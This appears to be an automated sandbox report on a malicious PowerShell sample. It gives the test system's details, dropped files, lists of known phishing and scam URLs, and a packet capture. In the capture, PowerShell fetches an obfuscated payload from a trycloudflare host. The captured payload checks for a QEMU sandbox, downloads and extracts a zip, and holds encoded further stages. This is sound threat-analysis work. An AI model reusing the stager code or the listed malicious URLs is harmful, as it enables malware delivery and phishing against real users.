                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:5
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal72.evad.win@7/7@1/1
                              Cookbook Comments:
                              • Stop behavior analysis, all processes terminated
                              • Not all processes where analyzed, report is missing behavior information
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              TimeTypeDescription
                              19:14:02API Interceptor27x Sleep call for process: powershell.exe modified
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CLOUDFLARENETUShttps://b974c735-d8d9-428f-a9da-bd19fb26da92.s3.ap-northeast-2.amazonaws.com/@%25$%5E%5E$!!$&%5E%25!&@%23!@%23%23&%5E&%25%5E@@%25$&!!$@&!$%25%23&%5E%23$%23%25/index.html?sub1=1632909553&sub2=173.94.5.133&sub3=5659135&sub4=Spectrum&sub5=1632909553.com&sub6=970524&sub7=kahoot&sub8=nc&ref_id=7Ipry6sF7qg&cost=0.307/Get hashmaliciousTechSupportScamBrowse
                              • 104.17.25.14
                              https://nikugora.github.io/facebook-news-clone/Get hashmaliciousHTMLPhisherBrowse
                              • 104.17.25.14
                              https://sg.zhouazhou.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                              • 104.21.63.63
                              http://apply-verified-officail-badge-form.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                              • 104.18.187.31
                              https://zanuwopugra-2999.vercel.app/ratixx.html/Get hashmaliciousHTMLPhisherBrowse
                              • 172.67.75.166
                              http://khan-khan.com/brb.phpGet hashmaliciousHTMLPhisherBrowse
                              • 104.17.247.203
                              http://mailser.reckon.solutions/Alibaba/alibaba-RD83-simple-freshGet hashmaliciousHTMLPhisherBrowse
                              • 104.17.25.14
                              http://hello-dr-lutus-best-603.tofesef554.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                              • 104.21.16.98
                              https://ozmax.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                              • 104.16.124.96
                              https://cpl-app-coinbasepro-auth.webflow.io/Get hashmaliciousUnknownBrowse
                              • 104.18.36.248
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              3b5074b1b5d032e5620f69f9f700ff0ehttps://mytalktalk87.weebly.com/Get hashmaliciousUnknownBrowse
                              • 104.16.231.132
                              https://lbipool.com/11/login.php/Get hashmaliciousUnknownBrowse
                              • 104.16.231.132
                              https://zanuwopugra-2999.vercel.app/ratixx.html/Get hashmaliciousHTMLPhisherBrowse
                              • 104.16.231.132
                              http://hello-dr-lutus-best-603.tofesef554.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                              • 104.16.231.132
                              http://vhztnqfkjxglp.work/Get hashmaliciousTelegram PhisherBrowse
                              • 104.16.231.132
                              https://livefoboubioluidfbdibisdi.weebly.com/Get hashmaliciousUnknownBrowse
                              • 104.16.231.132
                              https://portfolio--ndax.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                              • 104.16.231.132
                              https://bellsales.github.io/loginGet hashmaliciousHTMLPhisherBrowse
                              • 104.16.231.132
                              http://uphiodloagi.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                              • 104.16.231.132
                              No context
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2476
                              Entropy (8bit):5.526597432339347
                              Encrypted:false
                              SSDEEP:48:O1WSU4Yymp+ms4RIoU99tK8NTDR8XYfbcjDR3d7RTUOiGd7qmYzxIm:ULHYvVsIfA2KTD3jMN2Odd7Ozz
                              MD5:C82B4FF98A777F0704D435EF995FB539
                              SHA1:F49C93D9AAEC3F9191C3EF940D95BF00A7C2F1F2
                              SHA-256:785F3098C3C4A1748F24FB4140B106C3559441F228E0A9DB3B28A9B1437ECDCD
                              SHA-512:811565C55C8CF473D48E66F6DA4120C6D1158F766E17294DBBBB6EFC1468A7E9620ECF75FDAF0A50D9BB88A460ED1589DAC9353012D8446B4CB6F85A32183E23
                              Malicious:false
                              Reputation:low
                              Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6222
                              Entropy (8bit):3.7214351785016744
                              Encrypted:false
                              SSDEEP:96:GFWCvP8+kvhkvCCtKX9j0L6HVV9j0L6HVp:GFdP9KXR0L2VR0L2p
                              MD5:1BDD22B6E98446810B044513541A87F5
                              SHA1:4FE13A838D89181BEC2C62612D8671C78667CB2F
                              SHA-256:31C8B2B9DA6F7587817428FBA17CD792A2862D3D0CA05FF64D693CA0C824AA49
                              SHA-512:8C22E7AED02DEC19FE27C77B781D08754B51E874EF4DA677C93F7A94C23196C6C79BF05B4B761B6EC46511B76AFF5300DD37E463C69CD046D05EF748E6199CF8
                              Malicious:false
                              Preview:...................................FL..................F.".. ......Yd....^.2f...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd...p...us...k..us......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B?Z............................d...A.p.p.D.a.t.a...B.V.1.....?Z....Roaming.@......EW)B?Z.............................o.R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B?Z.............................. .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B?Z............................g.I.W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B?Z......................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B?Z......................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)BEW.C.....0..........
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6222
                              Entropy (8bit):3.7214351785016744
                              Encrypted:false
                              SSDEEP:96:GFWCvP8+kvhkvCCtKX9j0L6HVV9j0L6HVp:GFdP9KXR0L2VR0L2p
                              MD5:1BDD22B6E98446810B044513541A87F5
                              SHA1:4FE13A838D89181BEC2C62612D8671C78667CB2F
                              SHA-256:31C8B2B9DA6F7587817428FBA17CD792A2862D3D0CA05FF64D693CA0C824AA49
                              SHA-512:8C22E7AED02DEC19FE27C77B781D08754B51E874EF4DA677C93F7A94C23196C6C79BF05B4B761B6EC46511B76AFF5300DD37E463C69CD046D05EF748E6199CF8
                              Malicious:false
                              Preview:...................................FL..................F.".. ......Yd....^.2f...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd...p...us...k..us......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B?Z............................d...A.p.p.D.a.t.a...B.V.1.....?Z....Roaming.@......EW)B?Z.............................o.R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B?Z.............................. .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B?Z............................g.I.W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B?Z......................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B?Z......................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)BEW.C.....0..........
                              No static file info

                              Download Network PCAP: filteredfull

                              • Total Packets: 19
                              • 443 (HTTPS)
                              • 53 (DNS)
                              TimestampSource PortDest PortSource IPDest IP
                              Jan 31, 2025 01:14:04.048394918 CET49706443192.168.2.8104.16.231.132
                              Jan 31, 2025 01:14:04.048438072 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:04.048497915 CET49706443192.168.2.8104.16.231.132
                              Jan 31, 2025 01:14:04.060519934 CET49706443192.168.2.8104.16.231.132
                              Jan 31, 2025 01:14:04.060534000 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:04.542354107 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:04.542457104 CET49706443192.168.2.8104.16.231.132
                              Jan 31, 2025 01:14:04.545382977 CET49706443192.168.2.8104.16.231.132
                              Jan 31, 2025 01:14:04.545396090 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:04.546104908 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:04.562105894 CET49706443192.168.2.8104.16.231.132
                              Jan 31, 2025 01:14:04.607338905 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.661056995 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.661099911 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.661124945 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.661148071 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.661170006 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.661195040 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.661353111 CET49706443192.168.2.8104.16.231.132
                              Jan 31, 2025 01:14:05.661353111 CET49706443192.168.2.8104.16.231.132
                              Jan 31, 2025 01:14:05.661387920 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.661824942 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.661878109 CET49706443192.168.2.8104.16.231.132
                              Jan 31, 2025 01:14:05.661885023 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.665785074 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.665812016 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.665834904 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.665859938 CET49706443192.168.2.8104.16.231.132
                              Jan 31, 2025 01:14:05.665864944 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.665896893 CET49706443192.168.2.8104.16.231.132
                              Jan 31, 2025 01:14:05.719372034 CET49706443192.168.2.8104.16.231.132
                              Jan 31, 2025 01:14:05.749608040 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.749747992 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.749772072 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.749792099 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.749806881 CET49706443192.168.2.8104.16.231.132
                              Jan 31, 2025 01:14:05.749824047 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.749846935 CET49706443192.168.2.8104.16.231.132
                              Jan 31, 2025 01:14:05.750266075 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.750289917 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.750312090 CET49706443192.168.2.8104.16.231.132
                              Jan 31, 2025 01:14:05.750315905 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.750353098 CET49706443192.168.2.8104.16.231.132
                              Jan 31, 2025 01:14:05.750355959 CET44349706104.16.231.132192.168.2.8
                              Jan 31, 2025 01:14:05.750396967 CET49706443192.168.2.8104.16.231.132
                              Jan 31, 2025 01:14:05.912930965 CET49706443192.168.2.8104.16.231.132
                              TimestampSource PortDest PortSource IPDest IP
                              Jan 31, 2025 01:14:04.030565977 CET5007653192.168.2.81.1.1.1
                              Jan 31, 2025 01:14:04.040596008 CET53500761.1.1.1192.168.2.8
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Jan 31, 2025 01:14:04.030565977 CET192.168.2.81.1.1.10x6038Standard query (0)occasional-peterson-blast-sussex.trycloudflare.comA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Jan 31, 2025 01:14:04.040596008 CET1.1.1.1192.168.2.80x6038No error (0)occasional-peterson-blast-sussex.trycloudflare.com104.16.231.132A (IP address)IN (0x0001)false
                              Jan 31, 2025 01:14:04.040596008 CET1.1.1.1192.168.2.80x6038No error (0)occasional-peterson-blast-sussex.trycloudflare.com104.16.230.132A (IP address)IN (0x0001)false
                              • occasional-peterson-blast-sussex.trycloudflare.com
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.849706104.16.231.1324437524C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              TimestampBytes transferredDirectionData
                              2025-01-31 00:14:04 UTC231OUTGET /cloudfls HTTP/1.1
                              X-Computer-Name: user-PC
                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                              Host: occasional-peterson-blast-sussex.trycloudflare.com
                              Connection: Keep-Alive
                              2025-01-31 00:14:05 UTC214INHTTP/1.1 200 OK
                              Date: Fri, 31 Jan 2025 00:14:05 GMT
                              Content-Type: application/octet-stream
                              Content-Length: 26411
                              Connection: close
                              CF-Ray: 90a57fdedb8443f7-EWR
                              CF-Cache-Status: DYNAMIC
                              Server: cloudflare
                              2025-01-31 00:14:05 UTC1155INData Raw: 20 24 7b 5f 2f 3d 5c 5f 5f 2f 3d 5c 2f 5c 2f 3d 5c 2f 3d 3d 7d 20 3d 20 67 77 6d 69 20 57 69 6e 33 32 5f 43 6f 6d 70 75 74 65 72 53 79 73 74 65 6d 20 7c 20 73 65 6c 65 63 74 20 2d 45 78 70 61 6e 64 50 72 6f 70 65 72 74 79 20 4d 61 6e 75 66 61 63 74 75 72 65 72 0a 69 66 20 28 24 7b 5f 2f 3d 5c 5f 5f 2f 3d 5c 2f 5c 2f 3d 5c 2f 3d 3d 7d 20 2d 65 71 20 24 28 5b 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 55 6e 69 63 6f 64 65 2e 47 65 74 53 74 72 69 6e 67 28 5b 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 27 55 51 42 46 41 45 30 41 56 51 41 3d 27 29 29 29 29 20 7b 0a 20 20 20 20 65 78 69 74 20 30 3b 0a 7d 0a 24 7b 2f 3d 5c 5f 2f 5c 2f 3d 3d 5c 2f 5c 5f 5f 5f 5f 5f 7d 20 3d 20 28 47 65 74 2d 43 69 6d 49 6e 73 74 61 6e 63
                              Data Ascii: ${_/=\__/=\/\/=\/==} = gwmi Win32_ComputerSystem | select -ExpandProperty Manufacturerif (${_/=\__/=\/\/=\/==} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UQBFAE0AVQA=')))) { exit 0;}${/=\_/\/==\/\_____} = (Get-CimInstanc
                              2025-01-31 00:14:05 UTC1369INData Raw: 42 73 41 47 38 41 59 51 42 6b 41 47 55 41 5a 41 41 75 41 48 6f 41 61 51 42 77 41 41 3d 3d 27 29 29 29 29 0a 69 77 72 20 2d 75 72 69 20 24 7b 2f 3d 5c 5f 5f 5f 5f 2f 5c 5f 2f 3d 3d 5c 2f 5c 5f 7d 20 2d 6f 20 24 7b 5f 5f 2f 5c 2f 3d 3d 3d 5c 5f 2f 3d 5c 5f 2f 3d 3d 7d 0a 74 72 79 20 7b 0a 20 20 20 20 24 7b 5f 5f 5f 2f 5c 2f 5c 5f 2f 5c 5f 5f 2f 5c 5f 2f 5c 7d 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 2d 43 6f 6d 4f 62 6a 65 63 74 20 53 68 65 6c 6c 2e 41 70 70 6c 69 63 61 74 69 6f 6e 0a 20 20 20 20 24 7b 5f 5f 2f 5c 5f 5f 2f 5c 2f 3d 3d 5c 2f 5c 5f 5f 2f 7d 20 3d 20 24 7b 5f 5f 5f 2f 5c 2f 5c 5f 2f 5c 5f 5f 2f 5c 5f 2f 5c 7d 2e 4e 61 6d 65 53 70 61 63 65 28 24 7b 5f 5f 2f 5c 2f 3d 3d 3d 5c 5f 2f 3d 5c 5f 2f 3d 3d 7d 29 0a 20 20 20 20 24 7b 2f 3d 3d 3d 3d 5c
                              Data Ascii: BsAG8AYQBkAGUAZAAuAHoAaQBwAA=='))))iwr -uri ${/=\____/\_/==\/\_} -o ${__/\/===\_/=\_/==}try { ${___/\/\_/\__/\_/\} = New-Object -ComObject Shell.Application ${__/\__/\/==\/\__/} = ${___/\/\_/\__/\_/\}.NameSpace(${__/\/===\_/=\_/==}) ${/====\
                              2025-01-31 00:14:05 UTC1369INData Raw: 41 57 41 42 4b 41 47 34 41 5a 41 42 73 41 48 4d 41 65 41 42 59 41 46 4d 41 51 51 42 6f 41 46 41 41 56 41 41 77 41 47 63 41 5a 41 42 58 41 44 55 41 61 77 42 61 41 46 63 41 57 67 42 77 41 47 49 41 62 51 42 57 41 47 73 41 53 51 42 44 41 46 6b 41 62 51 42 4a 41 45 67 41 51 67 42 35 41 47 49 41 4d 67 42 4f 41 47 77 41 59 77 41 7a 41 45 30 41 64 51 42 5a 41 46 67 41 53 67 42 75 41 47 51 41 62 41 42 7a 41 48 6b 41 57 41 42 54 41 45 45 41 4f 51 42 51 41 46 51 41 4d 41 42 6e 41 47 51 41 56 77 41 31 41 47 73 41 57 67 42 58 41 46 6f 41 63 41 42 69 41 47 30 41 56 67 42 72 41 45 73 41 55 77 42 43 41 44 63 41 53 51 42 48 41 45 34 41 64 67 42 69 41 47 34 41 54 67 41 77 41 45 6b 41 52 77 42 4f 41 47 38 41 59 51 42 58 41 48 67 41 61 77 42 4a 41 45 51 41 4d 41 42 6e 41 47
                              Data Ascii: AWABKAG4AZABsAHMAeABYAFMAQQBoAFAAVAAwAGcAZABXADUAawBaAFcAWgBwAGIAbQBWAGsASQBDAFkAbQBJAEgAQgB5AGIAMgBOAGwAYwAzAE0AdQBZAFgASgBuAGQAbABzAHkAWABTAEEAOQBQAFQAMABnAGQAVwA1AGsAWgBXAFoAcABiAG0AVgBrAEsAUwBCADcASQBHAE4AdgBiAG4ATgAwAEkARwBOAG8AYQBXAHgAawBJAEQAMABnAG
                              2025-01-31 00:14:05 UTC1369INData Raw: 51 51 41 79 41 45 34 41 56 41 42 42 41 48 63 41 54 51 42 54 41 45 45 41 4b 77 42 4a 41 45 4d 41 55 67 42 31 41 47 51 41 56 77 42 34 41 48 4d 41 53 51 42 45 41 45 6b 41 4b 77 42 4b 41 47 6f 41 52 51 42 6e 41 45 38 41 65 51 42 43 41 47 77 41 57 51 41 79 41 47 67 41 64 67 42 4a 41 45 59 41 64 77 42 75 41 47 51 41 62 51 42 57 41 48 6b 41 59 77 41 79 41 47 77 41 64 67 42 69 41 47 6f 41 62 77 42 6e 41 45 6f 41 65 51 42 42 41 48 49 41 53 51 42 49 41 46 6f 41 62 41 42 6a 41 47 6b 41 51 51 42 79 41 45 6b 41 51 77 42 6b 41 47 4d 41 53 67 42 35 41 45 45 41 4e 77 42 4a 41 45 63 41 62 41 42 74 41 45 6b 41 51 77 42 6f 41 47 49 41 56 51 41 79 41 46 59 41 61 67 42 6b 41 46 67 41 53 67 42 77 41 47 51 41 53 41 42 72 41 48 55 41 56 51 42 49 41 45 6f 41 63 41 42 69 41 47 30
                              Data Ascii: QQAyAE4AVABBAHcATQBTAEEAKwBJAEMAUgB1AGQAVwB4AHMASQBEAEkAKwBKAGoARQBnAE8AeQBCAGwAWQAyAGgAdgBJAEYAdwBuAGQAbQBWAHkAYwAyAGwAdgBiAGoAbwBnAEoAeQBBAHIASQBIAFoAbABjAGkAQQByAEkAQwBkAGMASgB5AEEANwBJAEcAbABtAEkAQwBoAGIAVQAyAFYAagBkAFgASgBwAGQASABrAHUAVQBIAEoAcABiAG0
                              2025-01-31 00:14:05 UTC1369INData Raw: 41 42 5a 41 44 49 41 61 41 42 32 41 45 6b 41 52 67 42 33 41 47 34 41 55 41 42 54 41 44 41 41 4f 51 42 4d 41 46 51 41 4d 41 42 30 41 46 41 41 55 77 41 77 41 44 6b 41 54 41 42 57 41 48 63 41 62 67 42 4a 41 45 51 41 63 77 42 6e 41 47 51 41 52 77 42 47 41 48 6f 41 59 51 41 79 41 48 67 41 63 41 42 6a 41 44 4d 41 55 51 42 6e 41 45 77 41 4d 77 42 4f 41 44 49 41 57 51 42 35 41 45 45 41 4e 77 42 4a 41 45 63 41 56 67 42 71 41 47 45 41 52 77 41 34 41 47 63 41 57 41 42 44 41 47 4d 41 4f 51 42 4d 41 46 51 41 4d 41 42 30 41 46 41 41 55 77 41 77 41 44 6b 41 54 41 42 55 41 44 41 41 64 41 42 59 41 45 4d 41 59 77 42 6e 41 45 38 41 65 51 42 43 41 45 67 41 57 67 42 59 41 46 45 41 64 41 42 56 41 44 49 41 56 67 42 35 41 47 51 41 62 51 42 73 41 47 6f 41 57 67 42 54 41 45 49 41
                              Data Ascii: ABZADIAaAB2AEkARgB3AG4AUABTADAAOQBMAFQAMAB0AFAAUwAwADkATABWAHcAbgBJAEQAcwBnAGQARwBGAHoAYQAyAHgAcABjADMAUQBnAEwAMwBOADIAWQB5AEEANwBJAEcAVgBqAGEARwA4AGcAWABDAGMAOQBMAFQAMAB0AFAAUwAwADkATABUADAAdABYAEMAYwBnAE8AeQBCAEgAWgBYAFEAdABVADIAVgB5AGQAbQBsAGoAWgBTAEIA
                              2025-01-31 00:14:05 UTC1369INData Raw: 42 74 41 45 30 41 62 77 42 4b 41 44 49 41 54 67 42 76 41 46 6b 41 4d 77 42 42 41 47 63 41 54 67 42 71 41 46 55 41 64 77 42 4e 41 45 51 41 52 51 42 6e 41 46 41 41 61 51 42 43 41 45 38 41 56 67 42 56 41 48 63 41 5a 77 42 4e 41 47 6f 41 4e 41 42 74 41 45 30 41 55 77 42 42 41 47 30 41 53 51 42 48 41 46 59 41 61 67 42 68 41 45 63 41 4f 41 42 6e 41 46 67 41 51 77 42 6b 41 44 49 41 57 67 42 59 41 45 6f 41 65 67 42 68 41 46 63 41 4f 51 42 31 41 45 6b 41 51 77 41 77 41 47 63 41 53 67 42 35 41 45 45 41 63 67 42 4a 41 45 67 41 57 67 42 73 41 47 4d 41 61 51 42 42 41 48 49 41 53 51 42 44 41 47 51 41 59 77 42 4b 41 48 6b 41 51 51 42 74 41 45 6b 41 53 41 42 4f 41 44 55 41 59 77 41 7a 41 46 49 41 62 41 42 69 41 46 63 41 62 41 42 31 41 46 6f 41 62 51 41 34 41 47 34 41 54
                              Data Ascii: BtAE0AbwBKADIATgBvAFkAMwBBAGcATgBqAFUAdwBNAEQARQBnAFAAaQBCAE8AVgBVAHcAZwBNAGoANABtAE0AUwBBAG0ASQBHAFYAagBhAEcAOABnAFgAQwBkADIAWgBYAEoAegBhAFcAOQB1AEkAQwAwAGcASgB5AEEAcgBJAEgAWgBsAGMAaQBBAHIASQBDAGQAYwBKAHkAQQBtAEkASABOADUAYwAzAFIAbABiAFcAbAB1AFoAbQA4AG4AT
                              2025-01-31 00:14:05 UTC1369INData Raw: 4e 41 48 6b 41 56 41 42 46 41 46 55 41 62 77 42 55 41 46 63 41 52 67 41 77 41 47 45 41 51 77 41 31 41 48 6b 41 57 51 42 58 41 44 55 41 61 77 42 69 41 44 49 41 4d 41 42 76 41 45 73 41 55 77 42 42 41 48 45 41 53 51 42 45 41 45 55 41 64 77 42 4e 41 45 51 41 51 51 42 33 41 45 30 41 52 41 42 42 41 48 63 41 54 51 42 44 41 47 73 41 4e 77 42 4a 41 45 63 41 54 67 42 32 41 47 49 41 62 67 42 4f 41 44 41 41 53 51 42 48 41 44 55 41 4d 51 42 69 41 46 63 41 53 67 42 73 41 47 4d 41 61 77 42 4b 41 44 45 41 57 67 42 74 41 46 6f 41 62 41 42 6a 41 47 73 41 62 41 42 72 41 45 6b 41 52 41 41 77 41 47 63 41 55 51 42 75 41 46 59 41 62 51 42 61 41 47 30 41 56 67 42 35 41 45 77 41 62 51 42 47 41 48 4d 41 59 67 42 48 41 44 6b 41 61 67 42 4c 41 45 51 41 53 51 42 77 41 45 38 41 65 51
                              Data Ascii: NAHkAVABFAFUAbwBUAFcARgAwAGEAQwA1AHkAWQBXADUAawBiADIAMABvAEsAUwBBAHEASQBEAEUAdwBNAEQAQQB3AE0ARABBAHcATQBDAGsANwBJAEcATgB2AGIAbgBOADAASQBHADUAMQBiAFcASgBsAGMAawBKADEAWgBtAFoAbABjAGsAbABrAEkARAAwAGcAUQBuAFYAbQBaAG0AVgB5AEwAbQBGAHMAYgBHADkAagBLAEQASQBwAE8AeQ
